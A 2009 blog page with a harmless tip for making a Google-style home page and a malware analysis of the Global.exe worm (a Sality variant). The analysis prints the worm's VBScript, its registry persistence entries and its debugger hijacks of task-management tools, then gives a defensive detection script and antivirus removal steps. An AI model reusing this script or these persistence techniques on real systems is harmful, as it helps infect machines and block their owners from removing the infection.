Tuesday, 06 January 2009

5 Steps to Replace the Google Logo with Your Name

Everyone knows Google, the popular search engine with its simple white page and the “Google” logo above the search box.

If you are bored with that logo, you can create a Google-like page with your own name. It is very easy. Just click the logo and style you want, and in an instant you will have a Google-like search page bearing your name. Here are the steps:

1. Open the site http://www.funnylogo.info/create.asp
2. Enter the name you want on that site. For example: Erlan Googl
3. Choose the text style you want, e.g. Google Style.
4. Click “Create My Search Engine”.
5. A “Google site” page will then appear with the logo you wanted.

To make that page the default page when you open your browser, copy the address shown in the Address bar.

For Internet Explorer (IE):
1. Click the Tools - Internet Options menu
2. Select the General tab, then change the Home Page field to that address.

For the Mozilla browser:
1. Click the Tools - Options menu
2. Select the Main tab, then change the Home Page field to that address.
3. In the When Firefox starts field, choose the Show my home page setting, then click OK.

Once all the steps are done, open your browser and check the result.

Monday, 05 January 2009

Removing the Global.exe Virus

The results of my analysis when examining this virus

Malware name : Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Size : 286,720 bytes

Virus submitter : found by Morphost's heuristic method

Icon : folder icon

CRC32 : 55BC6B01 (based on the file found)

MD5 : 67CE8B53CBF5A1D3BF4269748F82ACCA (based on the file found)

Written in : Visual Basic


The project directory used when this virus was built is:

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp


The following VBS script was found:

dim fs,rg

set fs = createobject("scripting.filesystemobject")

set rg = createobject("wscript.shell")

on error resume next

rg.regwrite "HKCR\.vbs\", "VBSFile"

rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"

rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"

rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"

rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"

rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"

rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"


rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName","Local Group Policy"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath",""

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID","LocalGPO"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName","Local Group Policy"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID","Local"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters",""

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script","C:\WINDOWS\Cursors\Boom.vbs"


rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID", "Local"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script", "C:\WINDOWS\Cursors\Boom.vbs"


rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID", "Local"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script", "C:\WINDOWS\Cursors\Boom.vbs"


If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")

If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")

If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")

If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")

If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")

If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")

If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")

If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")




Creates files at:

“C:\windows\system32\dllchace\autorun.inf”

“C:\windows\Cursors\Boom.vbs”

And others



Creates the following registry keys:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

DisableStatusMessages = 0x00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

sys = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

(Default) = "%Windir%\system\KEYBOARD.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]

Debugger = "%FontsDir%\fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]

Debugger = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]

Debugger = "%Windir%\Media\rndll32.pif"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]

Debugger = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]

Debugger = "%FontsDir%\tskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_CURRENT_USER\Control Panel\Desktop]

SCRNSAVE.EXE = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"



Deletes the following registry entry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%SystemRoot%\system32\mmc.exe "%1" %*"




Modifies the following registry values:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]

(Default) = "%Windir%\pchealth\Global.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

ValueName = "ShowSuperHiden"

[HKEY_CURRENT_USER\Control Panel\Desktop]

AutoEndTasks = "1"

ScreenSaveTimeOut = "30"
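As an added example (not part of the original post and not Morphost code), the Python below triages a listing in the format shown above and labels each entry with the persistence or hijack technique it represents. The rule names and the functions `parse_listing` and `triage` are illustrative assumptions; the sample entries are excerpted from the listings in this post.

```python
import re
# Each rule: (technique, regex on key path, value name or None for any, test on the data).
# The handler rule is a heuristic: an open command without "%1" ignores the file it was given.
RULES = [
    ("ifeo-debugger", r"\\Image File Execution Options\\[^\\]+$", "debugger", lambda d: True),
    ("autostart", r"\\CurrentVersion\\(policies\\Explorer\\)?Run(Once)?$", None, lambda d: True),
    ("handler-hijack", r"\\shell\\open\\command$", "(default)", lambda d: "%1" not in d),
    ("hidden-extension", r"\\Classes\\(exe|com)file$", "nevershowext", lambda d: True),
    ("policy-script", r"\\System\\Scripts\\(Startup|Shutdown|Logoff)$", "script", lambda d: True),
    ("screensaver", r"\\Control Panel\\Desktop$", "scrnsave.exe", lambda d: not d.lower().endswith(".scr")),
]

def parse_listing(text):
    """Yield (key, value_name, data) from '[KEY]' lines followed by 'Name = "data"' lines."""
    key = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("* ")
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and " = " in line:
            name, _, data = line.partition(" = ")
            yield key, name.strip(), data.strip().strip('"')

def triage(text):
    """Return sorted (technique, key, data) tuples for every entry that matches a rule."""
    findings = set()
    for key, name, data in parse_listing(text):
        for technique, key_re, want, pred in RULES:
            name_ok = want is None or name.lower() == want
            if name_ok and re.search(key_re, key, re.I) and pred(data):
                findings.add((technique, key, data))
    return sorted(findings)

# Sample input: entries excerpted from the listings in this post.
SAMPLE = r'''[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]
NeverShowExt = "1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
(Default) = "%Windir%\system\KEYBOARD.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
Debugger = "%FontsDir%\tskmgr.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]
(Default) = "%Windir%\pchealth\Global.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
(Default) = "%SystemRoot%\system32\mmc.exe "%1" %*"
[HKEY_CURRENT_USER\Control Panel\Desktop]
SCRNSAVE.EXE = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]
Script = "%Windir%\Cursors\Boom.vbs"'''

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

The legitimate `mmc.exe "%1" %*` handler passes the heuristic, while the `regfile` handler pointing at `Global.exe` is reported.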



=============================================================================


This worm can now be cleaned up with Morphost Antivirus. [NB: Morphost has since been updated, so please download the new Morphost.]

I have added this worm's signature to the Morphost database, so you can now use Morphost to scan your computer for Global.Worm.

If Global.Worm still has not left your computer, do the following:

-Select the settings tab

-Select the option “let users make their database themselves” in the “database” frame

-Then add just one sample of Global.Worm

-And scan right away!